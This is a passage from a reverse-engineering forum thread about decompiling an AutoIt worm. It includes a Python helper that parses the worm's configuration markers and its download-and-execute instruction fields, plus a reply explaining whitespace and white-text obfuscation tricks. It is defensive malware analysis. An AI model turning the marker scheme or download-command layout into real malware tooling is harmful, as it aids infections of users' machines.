If someone is interested, I also packed the 'domesticated' version into the rar-archive I used for analysing. So far there is no real nice debugger for AutoIt - however the 'Alt+d' tool in SciTE (the editor that comes with AutoIt), to easily output certain vars to the console, is better than nothing.

That's all so far.
cw2k
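As an added example (not code from the post, the decompiler or the worm itself): a small Python helper that mirrors the marker scheme cw2k worked out above, written from the analyst's side. Presence markers are checked the way StringRegExp($Downloaded, marker, 0) does (1 if found, else 0), start/end marker pairs crop the hex payload between them (left undecrypted, since the post does not show what Fn000C does with $Var0096), and the decoded download instruction is split into the seven fields cw2k labelled. The marker strings are the ones from the post; the sample blob, its placeholder hex, the example.invalid URL and all function and field names are constructed for this example.

```python
import re
from typing import Dict, Optional

# Presence markers and their meaning as labelled in the post above.
FLAG_MARKERS = {
    "zZ45sAs": "do_not_download",               # $Var0072
    "M8Y77V69S8488S689O99Q": "do_192_168_thing",  # $Var0083
    "X5X14dMnb4b44bf": "logger_set_off",        # $Var0080
}

# Start/end marker pairs that bracket an encrypted hex payload (as sequenced in the post).
DATA_BLOCKS = {
    "block1_192_168": ("D7G445SdxFDC", "KzDLzS5c47zSDN"),
    "block2_download": ("FAq9PKZr3vC6sdS4FJ8ker64V1Edf6DS54Fa6G4Kgg5Dr25",
                        "A6SD54g984rhwhhswpd8581dsf681g6bn5146S1468d"),
}

HEX_RE = re.compile(r"^[0-9A-Fa-f]+$")


def has_marker(blob: str, marker: str) -> int:
    """Equivalent of StringRegExp($Downloaded, marker, 0): 1 if found, else 0.
    The markers are alphanumeric, so the 'regex' is effectively a literal search."""
    return 1 if re.search(re.escape(marker), blob) else 0


def str_crop(blob: str, start: str, end: str) -> Optional[str]:
    """Text between the first start marker and the next end marker, or None
    if either marker is missing (the post's StrCrop without the key step)."""
    i = blob.find(start)
    if i < 0:
        return None
    i += len(start)
    j = blob.find(end, i)
    if j < 0:
        return None
    return blob[i:j]


def parse_config(blob: str) -> Dict[str, object]:
    """Split a <...> envelope into boolean flags and still-encrypted payload blocks."""
    body = blob.strip()
    if not (body.startswith("<") and body.endswith(">")):
        raise ValueError("expected a <...> envelope")
    body = body[1:-1]
    flags = {name: bool(has_marker(body, m)) for m, name in FLAG_MARKERS.items()}
    blocks = {}
    for name, (start, end) in DATA_BLOCKS.items():
        payload = str_crop(body, start, end)
        # A block whose body is not hex is a sign the markers were mis-sequenced.
        blocks[name] = {
            "hex": payload,
            "looks_like_hex": bool(payload and HEX_RE.match(payload)),
        }
    return {"flags": flags, "blocks": blocks}


# Field names as cw2k labelled them for the decoded download instruction.
DOWNLOAD_FIELDS = ("DownloadUrl", "FileName", "FileGetSize", "FileVersion",
                   "RegWriteName", "RandomNameMax", "DoNotStartIfProcessExists")


def parse_download_command(decoded: str) -> Dict[str, str]:
    """Split the decrypted, space-separated download instruction into its seven fields."""
    parts = decoded.split()
    if len(parts) != len(DOWNLOAD_FIELDS):
        raise ValueError(f"expected {len(DOWNLOAD_FIELDS)} fields, got {len(parts)}")
    return dict(zip(DOWNLOAD_FIELDS, parts))


# Constructed sample: the page's markers, with placeholder hex instead of the real payloads.
SAMPLE_BLOB = (
    "<zZ45sAsM8Y77V69S8488S689O99Q"
    "D7G445SdxFDC" "4084065100AA" "KzDLzS5c47zSDN"
    "X5X14dMnb4b44bf"
    "FAq9PKZr3vC6sdS4FJ8ker64V1Edf6DS54Fa6G4Kgg5Dr25" "408178571CB7BB"
    "A6SD54g984rhwhhswpd8581dsf681g6bn5146S1468d>"
)
# Constructed stand-in for the decoded instruction (hostname replaced by example.invalid).
SAMPLE_DECODED = "http://example.invalid/idl.php cftuon.exe 495096 9.8.0.6 hk9x 1 yy-.exe"

if __name__ == "__main__":
    print(parse_config(SAMPLE_BLOB))
    print(parse_download_command(SAMPLE_DECODED))
```

The flag check deliberately keeps StringRegExp's 1/0 convention so the output lines up with the renamed variables in the post; the hex sanity flag is what tells you when a start/end pair was picked wrongly (e.g. the ambiguous "FB|A6SD54" boundary at the end of the second block).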

Re: Improved AutoIt3 Decompiler / myAutToExe Decompiler

Postby cw2k » Thu Apr 23, 2009 3:48:11 pm

falseaccount wrote: usually it works with other scripts, but for this one I cannot decompile them, I don't know why it is working for you :shock:
[screenshot]
I see you use Vista.
Well it also DID work for you ! :lol: I see it on ya screenshot.
The thing is - just use the scrollbars at the left of ya editor(or the pagedown pageup key on ya keyboard). :mrgreen:
So:
1. Have a look at the scrollbars and this newline trick won't trick you anymore
2. Press Ctrl+A to uncover the white-text-on-white-background trick.
(from the Black Hackers Handbook)
^At least I think so, never read it
- except the title - but I guess there is a great chance to find something like this in there.
